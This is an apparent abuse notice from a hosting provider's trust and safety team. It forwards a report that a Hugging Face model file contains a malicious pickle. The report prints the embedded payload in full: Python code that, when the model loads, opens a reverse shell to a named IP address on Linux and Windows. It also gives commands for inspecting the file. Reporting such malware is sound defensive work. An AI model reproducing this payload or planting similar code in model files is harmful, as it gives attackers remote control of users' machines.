Hello,
The hosting of an abusive content (Malware) on your dedicated server ns318025.ip-37-187-153.eu has been reported to or noticed by our Abuse Team.
Technical details (such as URLs) showing the aforementioned problem follow :
— start of the technical details —
— about —-
37.187.153.152
-Category: malware
—- logs follow —-
Hi,
This malicious Hugging Face model:
https://huggingface.co/jsteel2/taiwannumberone/blob/main/pytorch_model.bin
contains code that when loaded, opens a reverse shell to 37.187.153.152. You can check this with the commands:
wget https://huggingface.co/jsteel2/taiwannumberone/resolve/main/pytorch_model.bin
unzip pytorch_model.bin
cat pytorch_standard_model/data.pkl
The cat command shows:
\ufffdcbuiltins
exec
(X\ufffd
RHOST=»37.187.153.152″;RPORT=4242;
from sys import platform
if platform != ‘win32’:
import threading
def a():
import socket, pty, os
RHOST=»37.187.153.152″;RPORT=4242
s=socket.socket();s.connect((RHOST,RPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(«/bin/sh»)
threading.Thread(target=a).start()
else:
import os, socket, subprocess, threading, sys
def s2p(s, p):
while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()
def p2s(s, p):
while True: s.send(p.stdout.read(1).encode())
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try: s.connect((«37.187.153.152», 4242)); break
except: pass
p=subprocess.Popen([«powershell.exe»], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)
threading.Thread(target=s2p, args=[s,p], daemon=True).start()
threading.Thread(target=p2s, args=[s,p], daemon=True).start()
p.wait()
— Forwarded email(s) —
— end of the technical details —
Your should investigate and fix this problem, as it constitutes a violation to our terms of service.
Please answer to this e-mail indicating which measures you’ve taken to stop the abusive behaviour.
Cordially,
The OVHcloud Trust & Safety team.
